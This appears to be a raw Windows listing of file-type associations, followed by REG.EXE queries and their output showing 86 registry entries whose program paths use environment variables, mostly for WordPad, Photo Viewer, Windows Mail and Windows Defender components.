CABFolder=%SystemRoot%\Explorer.exe /idlist,%I,%L CATFile=%SystemRoot%\system32\rundll32.exe cryptext.dll,CryptExtOpenCAT %1 CERFile=%SystemRoot%\system32\rundll32.exe cryptext.dll,CryptExtOpenCER %1 CertificateStoreFile=%SystemRoot%\system32\rundll32.exe cryptext.dll,CryptExtOpenSTR %1 certificate_wab_auto_file="%ProgramFiles%\Windows Mail\wab.exe" /certificate "%1" chm.file="%SystemRoot%\hh.exe" %1 CompressedFolder=%SystemRoot%\Explorer.exe /idlist,%I,%L contact_wab_auto_file="%ProgramFiles%\Windows Mail\wab.exe" /contact "%1" CRLFile=%SystemRoot%\system32\rundll32.exe cryptext.dll,CryptExtOpenCRL %1 desktopthemepackfile=%SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\themecpl.dll,OpenThemeAction %1 Diagnostic.Cabinet=%SystemRoot%\system32\msdt.exe /cab "%1" Diagnostic.Config=%SystemRoot%\system32\msdt.exe /path "%1" Diagnostic.Document=%SystemRoot%\system32\msdt.exe /path "%1" Diagnostic.Perfmon.Config=%SystemRoot%\system32\perfmon /sys /load "%1" Diagnostic.Perfmon.Document=%SystemRoot%\system32\perfmon /sys /open "%1" Diagnostic.Resmon.Config=%SystemRoot%\system32\perfmon /res /load "%1" dlna-playsingle="%ProgramFiles%\Windows Media Player\wmplayer.exe" "%L" docxfile="%ProgramFiles%\Windows NT\Accessories\WORDPAD.EXE" "%1" emffile="%systemroot%\system32\mspaint.exe" "%1" evtfile=%SystemRoot%\system32\eventvwr.exe /l:"%1" evtxfile=%SystemRoot%\system32\eventvwr.exe /l:"%1" Explorer.AssocActionId.BurnSelection=%SystemRoot%\explorer.exe Explorer.AssocActionId.EraseDisc=%SystemRoot%\explorer.exe Explorer.AssocActionId.ZipSelection=%SystemRoot%\explorer.exe Explorer.AssocProtocol.search-ms=%SystemRoot%\Explorer.exe /separate,/idlist,%I,%L Folder=%SystemRoot%\Explorer.exe group_wab_auto_file="%ProgramFiles%\Windows Mail\wab.exe" /Group "%1" hlpfile=%SystemRoot%\winhlp32.exe %1 IMEDictionaryCompiler="%WINDIR%\system32\IME\SHARED\imewdbld.exe" "%1" %* imesxfile="%WINDIR%\system32\IME\SHARED\imesearch.exe" "%1" inffile=%SystemRoot%\system32\NOTEPAD.EXE %1 inifile=%SystemRoot%\system32\NOTEPAD.EXE %1 LDAP="%ProgramFiles%\Windows Mail\wab.exe" "/ldap:%1" MacromediaFlashPaper.MacromediaFlashPaper="%ProgramFiles%\Internet Explorer\iexplore.exe" "%1" Microsoft.ProvTool.Provisioning.1="%SystemRoot%\System32\provtool.exe" "%1" /source ShellOpen Microsoft.System.Update.1="%systemroot%\system32\wusa.exe" "%1" %* MMS="%ProgramFiles%\Windows Media Player\wmplayer.exe" "%L" ms-availablenetworks="%SystemRoot%\system32\LaunchWinApp.exe" "%1" ms-mmsys=%SystemRoot%\System32\rundll32.exe %SystemRoot%\System32\shell32.dll,Control_RunDLL %SystemRoot%\System32\mmsys.cpl %1 ms-msdt="%SystemRoot%\system32\msdt.exe" %1 ms-quick-assist="%SystemRoot%\system32\quickassist.exe" %1 ms-rdx-document=%SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\RDXService,OpenRDXDocument %1 ms-settings-connectabledevices="%SystemRoot%\system32\LaunchWinApp.exe" "%1" ms-settings-displays-topology="%SystemRoot%\system32\LaunchWinApp.exe" "%1" ms-virtualtouchpad="%SystemRoot%\system32\LaunchWinApp.exe" "%1" mscfile=%SystemRoot%\system32\mmc.exe "%1" %* MSDASC=Rundll32.exe "%CommonProgramFiles%\System\OLE DB\oledb32.dll",OpenDSLFile %1 Msi.Package="%SystemRoot%\System32\msiexec.exe" /i "%1" %* Msi.Patch="%SystemRoot%\System32\msiexec.exe" /p "%1" %* MSInfoFile=%SystemRoot%\system32\msinfo32.exe "%1" msstylesfile=%SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\shell32.dll,Control_RunDLL %SystemRoot%\system32\desk.cpl desk,@Appearance /Action:OpenMSTheme /file:"%1" odtfile="%ProgramFiles%\Windows NT\Accessories\WORDPAD.EXE" "%1" opensearchdescription=%SystemRoot%\explorer.exe P7RFile=%SystemRoot%\system32\rundll32.exe cryptext.dll,CryptExtOpenP7R %1 P7SFile=%SystemRoot%\system32\\rundll32.exe cryptext.dll,CryptExtOpenPKCS7 %1 pbkfile=%SystemRoot%\system32\rasphone.exe -f "%1" PerfFile=%SystemRoot%\system32\mmc.exe %systemroot%\system32\perfmon.msc /F "%1" PFXFile=%SystemRoot%\system32\rundll32.exe cryptext.dll,CryptExtOpenPFX %1 PhotoViewer.FileAssoc.Tiff=%SystemRoot%\System32\rundll32.exe "%ProgramFiles%\Windows Photo Viewer\PhotoViewer.dll", ImageView_Fullscreen %1 prffile="%SystemRoot%\System32\rundll32.exe" "%SystemRoot%\System32\msrating.dll",ClickedOnPRF %1 ratfile="%SystemRoot%\System32\rundll32.exe" "%SystemRoot%\System32\msrating.dll",ClickedOnRAT %1 RDP.File="%systemroot%\system32\mstsc.exe" "%1" RemoteAssistance.1="%systemRoot%\system32\msra.exe" -openfile "%1" rlefile="%systemroot%\system32\mspaint.exe" "%1" rtffile="%ProgramFiles%\Windows NT\Accessories\WORDPAD.EXE" "%1" SavedDsQuery=%SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\dsquery.dll,OpenSavedDsQuery %1 search=%SystemRoot%\Explorer.exe /separate,/idlist,%I,%L search-ms=%SystemRoot%\Explorer.exe /separate,/idlist,%I,%L SHCmdFile=%SystemRoot%\explorer.exe SPCFile=%SystemRoot%\system32\rundll32.exe cryptext.dll,CryptExtOpenPKCS7 %1 textfile="%ProgramFiles%\Windows NT\Accessories\WORDPAD.EXE" "%1" themefile=%SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\themecpl.dll,OpenThemeAction %1 themepackfile=%SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\themecpl.dll,OpenThemeAction %1 TIFImage.Document=%SystemRoot%\System32\rundll32.exe "%ProgramFiles%\Windows Photo Viewer\PhotoViewer.dll", ImageView_Fullscreen %1 txtfile=%SystemRoot%\system32\NOTEPAD.EXE %1 Undecided=%SystemRoot%\system32\OpenWith.exe "%1" Unknown=%SystemRoot%\system32\OpenWith.exe "%1" VBEFile="%SystemRoot%\System32\WScript.exe" "%1" %* VBSFile="%SystemRoot%\System32\WScript.exe" "%1" %* vcard_wab_auto_file="%ProgramFiles%\Windows Mail\wab.exe" /vcard "%1" WAB.AssocProtocol.LDAP="%ProgramFiles%\Windows Mail\wab.exe" "/ldap:%1" wab_auto_file="%ProgramFiles%\Windows Mail\wab.exe" /Import "%1" wbcatfile=%SystemRoot%\system32\sdclt.exe /restorepage webpnpFile=%SystemRoot%\system32\wpnpinst.exe %1 Windows.CompositeFont="%SystemRoot%\System32\notepad.exe" "%1" WindowsStore.License=%SystemRoot%\System32\licensemanagershellext.exe "%1" wmffile="%systemroot%\system32\mspaint.exe" "%1" WMP.DVR-MSFile="%ProgramFiles%\Windows Media Player\wmplayer.exe" /Open "%L" WMP.WTVFile="%ProgramFiles%\Windows Media Player\wmplayer.exe" /Open "%L" WMP11.AssocFile.3G2="%ProgramFiles%\Windows Media Player\wmplayer.exe" /prefetch:6 /Open "%L" WMP11.AssocFile.3GP="%ProgramFiles%\Windows Media Player\wmplayer.exe" /prefetch:6 /Open "%L" WMP11.AssocFile.ADTS="%ProgramFiles%\Windows Media Player\wmplayer.exe" /prefetch:6 /Open "%L" WMP11.AssocFile.AIFF="%ProgramFiles%\Windows Media Player\wmplayer.exe" /Open "%L" WMP11.AssocFile.ASF="%ProgramFiles%\Windows Media Player\wmplayer.exe" /prefetch:7 /Open "%L" WMP11.AssocFile.ASX="%ProgramFiles%\Windows Media Player\wmplayer.exe" /Open "%L" WMP11.AssocFile.AU="%ProgramFiles%\Windows Media Player\wmplayer.exe" /Open "%L" WMP11.AssocFile.AVI="%ProgramFiles%\Windows Media Player\wmplayer.exe" /prefetch:8 /Open "%L" WMP11.AssocFile.CDA="%ProgramFiles%\Windows Media Player\wmplayer.exe" /Open "%L" WMP11.AssocFile.FLAC="%ProgramFiles%\Windows Media Player\wmplayer.exe" /prefetch:6 /Open "%L" WMP11.AssocFile.M2TS="%ProgramFiles%\Windows Media Player\wmplayer.exe" /prefetch:12 /Open "%L" WMP11.AssocFile.m3u="%ProgramFiles%\Windows Media Player\wmplayer.exe" /prefetch:6 /Open "%L" WMP11.AssocFile.M4A="%ProgramFiles%\Windows Media Player\wmplayer.exe" /prefetch:6 /Open "%L" WMP11.AssocFile.MIDI="%ProgramFiles%\Windows Media Player\wmplayer.exe" /Open "%L" WMP11.AssocFile.MK3D="%ProgramFiles%\Windows Media Player\wmplayer.exe" /prefetch:6 /Open "%L" WMP11.AssocFile.MKA="%ProgramFiles%\Windows Media Player\wmplayer.exe" /prefetch:6 /Open "%L" WMP11.AssocFile.MKV="%ProgramFiles%\Windows Media Player\wmplayer.exe" /prefetch:6 /Open "%L" WMP11.AssocFile.MOV="%ProgramFiles%\Windows Media Player\wmplayer.exe" /prefetch:6 /Open "%L" WMP11.AssocFile.MP3="%ProgramFiles%\Windows Media Player\wmplayer.exe" /prefetch:6 /Open "%L" WMP11.AssocFile.MP4="%ProgramFiles%\Windows Media Player\wmplayer.exe" /prefetch:6 /Open "%L" WMP11.AssocFile.MPEG="%ProgramFiles%\Windows Media Player\wmplayer.exe" /prefetch:9 /Open "%L" WMP11.AssocFile.TTS="%ProgramFiles%\Windows Media Player\wmplayer.exe" /prefetch:12 /Open "%L" WMP11.AssocFile.WAV="%ProgramFiles%\Windows Media Player\wmplayer.exe" /Open "%L" WMP11.AssocFile.WAX="%ProgramFiles%\Windows Media Player\wmplayer.exe" /Open "%L" WMP11.AssocFile.wma="%ProgramFiles%\Windows Media Player\wmplayer.exe" /prefetch:5 /Open "%L" WMP11.AssocFile.WMD="%ProgramFiles%\Windows Media Player\wmplayer.exe" /WMPackage:"%L" WMP11.AssocFile.WMS="%ProgramFiles%\Windows Media Player\wmplayer.exe" /layout:"%L" WMP11.AssocFile.WMV="%ProgramFiles%\Windows Media Player\wmplayer.exe" /prefetch:7 /Open "%L" WMP11.AssocFile.WMZ="%ProgramFiles%\Windows Media Player\wmplayer.exe" /layout:"%L" WMP11.AssocFile.WPL="%ProgramFiles%\Windows Media Player\wmplayer.exe" /Open "%L" WMP11.AssocFile.WVX="%ProgramFiles%\Windows Media Player\wmplayer.exe" /Open "%L" WMP11.AssocProtocol.DLNA-PLAYSINGLE="%ProgramFiles%\Windows Media Player\wmplayer.exe" "%L" WMP11.AssocProtocol.MMS="%ProgramFiles%\Windows Media Player\wmplayer.exe" "%L" Wordpad.Document.1="%ProgramFiles%\Windows NT\Accessories\WORDPAD.EXE" "%1" WPDContextMenu.Url="%SystemRoot%\System32\rundll32.exe" "%SystemRoot%\System32\ieframe.dll",OpenURL %l WSFFile="%SystemRoot%\System32\WScript.exe" "%1" %* WSHFile="%SystemRoot%\System32\WScript.exe" "%1" %* zapfile=%SystemRoot%\system32\NOTEPAD.EXE %1
All registered path names containing environment variables:
REG.EXE QUERY "HKEY_LOCAL_MACHINE\SOFTWARE" /D /F "%*Dir^%\\" /S REG.EXE QUERY "HKEY_LOCAL_MACHINE\SOFTWARE" /D /F "%Common*^%\\" /S REG.EXE QUERY "HKEY_LOCAL_MACHINE\SOFTWARE" /D /F "%Program*^%\\" /S REG.EXE QUERY "HKEY_LOCAL_MACHINE\SOFTWARE" /D /F "%System*^%\\" /S REG.EXE QUERY "HKEY_LOCAL_MACHINE\SOFTWARE" /D /F "%WinDir^%\\" /S
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.contact\ShellNew command REG_EXPAND_SZ "%programFiles%\Windows Mail\Wab.exe" /CreateContact "%1" iconpath REG_EXPAND_SZ %ProgramFiles%\Windows Mail\wab.exe,1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.rtf\ShellNew ItemName REG_EXPAND_SZ @%ProgramFiles%\Windows NT\Accessories\WORDPAD.EXE,-213 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Applications\photoviewer.dll\shell\print\command (Default) REG_EXPAND_SZ %SystemRoot%\System32\rundll32.exe "%ProgramFiles%\Windows Photo Viewer\PhotoViewer.dll", ImageView_Fullscreen %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Applications\wordpad.exe\shell\open\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows NT\Accessories\WORDPAD.EXE" "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\certificate_wab_auto_file\DefaultIcon (Default) REG_EXPAND_SZ %ProgramFiles%\Windows Mail\wab.exe,1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\certificate_wab_auto_file\shell\open\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows Mail\wab.exe" /certificate "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00f20eb5-8fd6-4d9d-b75e-36801766c8f1}\InprocServer32 (Default) REG_EXPAND_SZ %ProgramFiles%\Windows Photo Viewer\PhotoAcq.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00f210a1-62f0-438b-9f7e-9618d72a1831}\InprocServer32 (Default) REG_EXPAND_SZ %ProgramFiles%\Windows Photo Viewer\PhotoAcq.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00f24ca0-748f-4e8a-894f-0e0357c6799f}\InprocServer32 (Default) REG_EXPAND_SZ %ProgramFiles%\Windows Photo Viewer\PhotoAcq.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00f26e02-e9f2-4a9f-9fdd-5a962fb26a98}\InprocServer32 (Default) REG_EXPAND_SZ %ProgramFiles%\Windows Photo Viewer\PhotoAcq.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00f29a34-b8a1-482c-bcf8-3ac7b0fe8f62}\InprocServer32 (Default) REG_EXPAND_SZ %ProgramFiles%\Windows Photo Viewer\PhotoAcq.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00f2b433-44e4-4d88-b2b0-2698a0a91dba}\LocalServer32 (Default) REG_EXPAND_SZ "%SystemRoot%\System32\rundll32.exe" "%ProgramFiles%\Windows Photo Viewer\PhotoAcq.dll",AutoplayComServerW {00f2b433-44e4-4d88-b2b0-2698a0a91dba} HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00F2CE1E-935E-4248-892C-130F32C45CB4}\InProcServer32 (Default) REG_EXPAND_SZ %ProgramFiles%\Windows Photo Viewer\PhotoAcq.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{195B4D07-3DE2-4744-BBF2-D90121AE785B}\InprocServer32 (Default) REG_EXPAND_SZ %ProgramFiles%\Windows Defender\DefenderCSP.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2781761E-28E0-4109-99FE-B9D127C57AFE}\InprocServer32 (Default) REG_EXPAND_SZ %ProgramFiles%\Windows Defender\MpOav.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{32624F4B-F1D5-4877-989E-555640109D2B}\InprocServer32 (Default) REG_EXPAND_SZ %ProgramFiles%\Windows Photo Viewer\PhotoViewer.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{361290c0-cb1b-49ae-9f3e-ba1cbe5dab35}\InprocServer32 (Default) REG_EXPAND_SZ %ProgramFiles%\Windows Defender\MpProvider.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{73FDDC80-AEA9-101A-98A7-00AA00374959} LocalizedString REG_EXPAND_SZ @%ProgramFiles%\Windows NT\Accessories\WORDPAD.EXE,-209 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{73FDDC80-AEA9-101A-98A7-00AA00374959}\AuxUserType\2 LocalizedString REG_EXPAND_SZ @%ProgramFiles%\Windows NT\Accessories\WORDPAD.EXE,-209 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{73FDDC80-AEA9-101A-98A7-00AA00374959}\AuxUserType\3 LocalizedString REG_EXPAND_SZ @%ProgramFiles%\Windows NT\Accessories\WORDPAD.EXE,-57344 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{73FDDC80-AEA9-101A-98A7-00AA00374959}\DefaultIcon (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows NT\Accessories\WORDPAD.EXE",1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{73FDDC80-AEA9-101A-98A7-00AA00374959}\LocalServer32 (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows NT\Accessories\WORDPAD.EXE" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{73FDDC80-AEA9-101A-98A7-00AA00374959}\verb\0 LocalizedString REG_EXPAND_SZ @%ProgramFiles%\Windows NT\Accessories\WORDPAD.EXE,-6300 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{73FDDC80-AEA9-101A-98A7-00AA00374959}\verb\1 LocalizedString REG_EXPAND_SZ @%ProgramFiles%\Windows NT\Accessories\WORDPAD.EXE,-6301 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{76D0CB12-7604-4048-B83C-1005C7DDC503}\InProcServer32 (Default) REG_EXPAND_SZ %ProgramFiles%\Windows Photo Viewer\PhotoViewer.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8a696d12-576b-422e-9712-01b9dd84b446}\InprocServer32 (Default) REG_EXPAND_SZ %ProgramFiles%\Windows Defender\MpProvider.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A2D75874-6750-4931-94C1-C99D3BC9D0C7} LocalizedString REG_EXPAND_SZ @%ProgramFiles%\Windows Defender\MpAsDesc.dll,-300 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A2D75874-6750-4931-94C1-C99D3BC9D0C7}\Elevation IconReference REG_EXPAND_SZ @%ProgramFiles%\Windows Defender\MpAsDesc.dll,-103 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A7C452EF-8E9F-42EB-9F2B-245613CA0DC9}\InprocServer32 (Default) REG_EXPAND_SZ %ProgramFiles%\Windows Defender\ProtectionManagement.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D63A1416-FCEC-4431-862F-E8056223DD03}\InprocServer32 (Default) REG_EXPAND_SZ %ProgramFiles%\Windows Photo Viewer\PhotoViewer.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{DACA056E-216A-4FD1-84A6-C306A017ECEC}\InprocServer32 (Default) REG_EXPAND_SZ %ProgramFiles%\Windows Defender\AMMonitoringProvider.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E429B25A-E5D3-4D1F-9BE3-0C608477E3A1}\InProcServer32 (Default) REG_EXPAND_SZ %programFiles%\Windows NT\TableTextService\TableTextService.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E598560B-28D5-46aa-A14A-8A3BEA34B576}\InProcServer32 (Default) REG_EXPAND_SZ %ProgramFiles%\Windows Photo Viewer\PhotoViewer.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{FEEE9C23-C4E2-4A34-8C73-FE8F9786C8B4}\InprocServer32 (Default) REG_EXPAND_SZ %ProgramFiles%\Windows Defender Advanced Threat Protection\WATPCSP.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{FFE2A43C-56B9-4bf5-9A79-CC6D4285608A}\InProcServer32 (Default) REG_EXPAND_SZ %ProgramFiles%\Windows Photo Viewer\PhotoViewer.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\contact_wab_auto_file\DefaultIcon (Default) REG_EXPAND_SZ %ProgramFiles%\Windows Mail\wab.exe,1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\contact_wab_auto_file\shell\open\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows Mail\wab.exe" /contact "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\contact_wab_auto_file\shell\print\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows Mail\wab.exe" /Print "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\docxfile FriendlyTypeName REG_EXPAND_SZ @%ProgramFiles%\Windows NT\Accessories\WORDPAD.EXE,-300 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\docxfile\DefaultIcon (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows NT\Accessories\WORDPAD.EXE",2 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\docxfile\shell\open\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows NT\Accessories\WORDPAD.EXE" "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\docxfile\shell\print\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows NT\Accessories\WORDPAD.EXE" /p "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\docxfile\shell\printto\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows NT\Accessories\WORDPAD.EXE" /pt "%1" "%2" "%3" "%4" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\group_wab_auto_file\DefaultIcon (Default) REG_EXPAND_SZ %ProgramFiles%\Windows Mail\wab.exe,2 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\group_wab_auto_file\shell\edit\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows Mail\wab.exe" /Group "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\group_wab_auto_file\shell\open\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows Mail\wab.exe" /Group "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\group_wab_auto_file\shell\print\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows Mail\wab.exe" /Print "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\LDAP\shell\open\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows Mail\wab.exe" "/ldap:%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MacromediaFlashPaper.MacromediaFlashPaper\DefaultIcon (Default) REG_EXPAND_SZ "%ProgramFiles%\Internet Explorer\iexplore.exe",-17 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MacromediaFlashPaper.MacromediaFlashPaper\shell\open\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Internet Explorer\iexplore.exe" "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\odtfile FriendlyTypeName REG_EXPAND_SZ @%ProgramFiles%\Windows NT\Accessories\WORDPAD.EXE,-301 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\odtfile\DefaultIcon (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows NT\Accessories\WORDPAD.EXE",3 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\odtfile\shell\open\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows NT\Accessories\WORDPAD.EXE" "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\odtfile\shell\print\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows NT\Accessories\WORDPAD.EXE" /p "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\odtfile\shell\printto\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows NT\Accessories\WORDPAD.EXE" /pt "%1" "%2" "%3" "%4" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PhotoViewer.FileAssoc.Tiff FriendlyTypeName REG_EXPAND_SZ @%ProgramFiles%\Windows Photo Viewer\PhotoViewer.dll,-3058 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PhotoViewer.FileAssoc.Tiff\shell\open MuiVerb REG_EXPAND_SZ @%ProgramFiles%\Windows Photo Viewer\photoviewer.dll,-3043 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PhotoViewer.FileAssoc.Tiff\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\System32\rundll32.exe "%ProgramFiles%\Windows Photo Viewer\PhotoViewer.dll", ImageView_Fullscreen %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\rtffile FriendlyTypeName REG_EXPAND_SZ @%ProgramFiles%\Windows NT\Accessories\WORDPAD.EXE,-190 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\rtffile\DefaultIcon (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows NT\Accessories\WORDPAD.EXE",1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\rtffile\shell\open\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows NT\Accessories\WORDPAD.EXE" "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\rtffile\shell\print\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows NT\Accessories\WORDPAD.EXE" /p "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\rtffile\shell\printto\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows NT\Accessories\WORDPAD.EXE" /pt "%1" "%2" "%3" "%4" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\image\shell\print\command (Default) REG_EXPAND_SZ %SystemRoot%\System32\rundll32.exe "%ProgramFiles%\Windows Photo Viewer\PhotoViewer.dll", ImageView_Fullscreen %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\textfile FriendlyTypeName REG_EXPAND_SZ @%ProgramFiles%\Windows NT\Accessories\WORDPAD.EXE,-189 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\textfile\shell\open\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows NT\Accessories\WORDPAD.EXE" "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\textfile\shell\print\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows NT\Accessories\WORDPAD.EXE" /p "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\textfile\shell\printto\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows NT\Accessories\WORDPAD.EXE" /pt "%1" "%2" "%3" "%4" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TIFImage.Document\shell\open MuiVerb REG_EXPAND_SZ @%ProgramFiles%\Windows Photo Viewer\photoviewer.dll,-3043 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TIFImage.Document\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\System32\rundll32.exe "%ProgramFiles%\Windows Photo Viewer\PhotoViewer.dll", ImageView_Fullscreen %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{00F25AE8-3625-4E34-92D4-F0918CF010EE}\1.0\0\win32 (Default) REG_EXPAND_SZ %ProgramFiles%\Windows Photo Viewer\PhotoAcq.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{00F25AE8-3625-4E34-92D4-F0918CF010EE}\1.0\0\win64 (Default) REG_EXPAND_SZ %ProgramFiles%\Windows Photo Viewer\PhotoAcq.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{00F25AE8-3625-4E34-92D4-F0918CF010EE}\1.0\HELPDIR (Default) REG_EXPAND_SZ %ProgramFiles%\Windows Photo Viewer HKEY_LOCAL_MACHINE\SOFTWARE\Classes\vcard_wab_auto_file\DefaultIcon (Default) REG_EXPAND_SZ %ProgramFiles%\Windows Mail\wab.exe,1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\vcard_wab_auto_file\shell\open\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows Mail\wab.exe" /vcard "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WAB.AssocProtocol.LDAP\shell\open\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows Mail\wab.exe" "/ldap:%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\wab_auto_file\DefaultIcon (Default) REG_EXPAND_SZ %ProgramFiles%\Windows Mail\wab.exe,10 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\wab_auto_file\shell\open\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows Mail\wab.exe" /Import "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wordpad.Document.1 FriendlyTypeName REG_EXPAND_SZ @%ProgramFiles%\Windows NT\Accessories\WORDPAD.EXE,-209 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wordpad.Document.1\DefaultIcon (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows NT\Accessories\WORDPAD.EXE",1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wordpad.Document.1\Protocol\StdFileEditing\Server (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows NT\Accessories\WORDPAD.EXE" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wordpad.Document.1\Protocol\StdFileEditing\Verb\0 LocalizedString REG_EXPAND_SZ @%ProgramFiles%\Windows NT\Accessories\WORDPAD.EXE,-6300 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wordpad.Document.1\shell\open\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows NT\Accessories\WORDPAD.EXE" "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wordpad.Document.1\shell\print\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows NT\Accessories\WORDPAD.EXE" /p "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wordpad.Document.1\shell\printto\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows NT\Accessories\WORDPAD.EXE" /pt "%1" "%2" "%3" "%4" End of search: 86 match(es) found. 